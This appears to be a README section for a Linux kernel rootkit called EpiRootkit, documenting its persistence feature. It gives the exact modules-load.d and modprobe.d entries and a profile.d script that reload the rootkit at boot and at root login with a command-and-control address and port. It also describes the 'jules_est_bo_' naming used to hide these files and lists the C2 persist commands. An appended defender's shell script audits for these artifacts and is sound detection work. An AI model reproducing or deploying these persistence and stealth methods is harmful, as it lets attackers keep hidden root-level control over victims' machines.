modules-load.d Method

Modules are

Creates two files:

/etc/modules-load.d/jules_est_bo_system.conf:

  # EpiRootkit module
  epirootkit

/etc/modprobe.d/jules_est_bo_modprobe.conf:

  # EpiRootkit module parameters
  options epirootkit address=192.168.200.11 port=4444

Shell Profile Method

Creates /etc/profile.d/jules_est_bo_env.sh:

  #!/bin/bash
  # System environment initialization
  if [ "$(id -u)" -eq 0 ]; then
      # Check if module is already loaded via proc filesystem
      if [ ! -f /sys/kernel/epirootkit/control ] && ! grep -q "^epirootkit " /proc/modules 2>/dev/null; then
          modprobe epirootkit address=192.168.200.11 port=4444 2>/dev/null || insmod /lib/modules/$(uname -r)/extra/epirootkit.ko address=192.168.200.11 port=4444 2>/dev/null
      fi
  fi

Commands

  persist                      # Install both methods
  persist_remove               # Remove all
  status                       # Check status

Testing

  sudo insmod epirootkit.ko address=192.168.200.11 port=4444
  # Install persistence via C2/WebUI command: persist
  sudo reboot
  lsmod | grep epirootkit

Status Response

  {
    "persistence": {
      "enabled": true,
      "methods": {
        "modules_load": {
          "active": true,
          "files": {
            "modules_load": "/etc/modules-load.d/jules_est_bo_system.conf",
            "modprobe": "/etc/modprobe.d/jules_est_bo_modprobe.conf"
          }
        },
        "shell_profile": {
          "active": true,
          "path": "/etc/profile.d/jules_est_bo_env.sh"
        }
      }
    }
  }

File Naming

  • modules-load.d: Uses jules_est_bo_ prefix for stealth (matches file hiding pattern)
  • modprobe.d: Uses jules_est_bo_ prefix for stealth consistency
  • profile.d: Uses jules_est_bo_ prefix for stealth

Reliable, standards-compliant persistence with consistent stealth naming.
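
For review from the defender's side, the following added example (not part of the project's code) lists the three artifact types described above: modules-load.d entries with no in-tree module file, modprobe.d options lines carrying an IPv4 address, and profile.d scripts that call modprobe or insmod. The function name and finding labels are hypothetical. Because the jules_est_bo_ prefix matches the rootkit's file hiding pattern, the function takes a root directory so it can be run against an offline mount of the disk rather than the live system.

```shell
#!/bin/sh
# Added example (not from the project): list module-load persistence for review.
# Usage: sh audit.sh ROOT   (ROOT is / or an offline mount such as /mnt/evidence)

# Emits tab-separated findings: kind, file, detail. Findings are review items,
# not verdicts: DKMS drivers and netconsole can legitimately appear here.
audit_module_persistence() {
    root=${1:-/}; root=${root%/}

    # 1. modules-load.d: names with no matching file under the in-tree kernel/ dir.
    for f in "$root"/etc/modules-load.d/*.conf; do
        [ -f "$f" ] || continue
        sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' -e '/^[#;]/d' -e '/^$/d' "$f" |
        while IFS= read -r mod; do
            # Module files may use '-' where the module name uses '_'.
            pat=$(printf '%s' "$mod" | sed 's/[-_]/[-_]/g')
            find "$root/lib/modules" -path '*/kernel/*' -name "$pat.ko*" \
                2>/dev/null | grep -q . ||
                printf 'boot-load\t%s\t%s\n' "$f" "$mod"
        done
    done

    # 2. modprobe.d: "options" lines that hand a module an IPv4 address.
    for f in "$root"/etc/modprobe.d/*.conf; do
        [ -f "$f" ] || continue
        grep -E '^[[:space:]]*options[[:space:]].*[0-9]+(\.[0-9]+){3}' "$f" |
        while IFS= read -r line; do
            printf 'net-option\t%s\t%s\n' "$f" "$line"
        done
    done

    # 3. profile.d: login scripts that load kernel modules (comment lines skipped).
    for f in "$root"/etc/profile.d/*.sh; do
        [ -f "$f" ] || continue
        grep -vE '^[[:space:]]*#' "$f" |
        grep -E '(^|[^[:alnum:]_])(modprobe|insmod)[[:space:]]' |
        while IFS= read -r line; do
            printf 'login-load\t%s\t%s\n' "$f" "$line"
        done
    done
}

if [ "$#" -gt 0 ]; then audit_module_persistence "$1"; fi
```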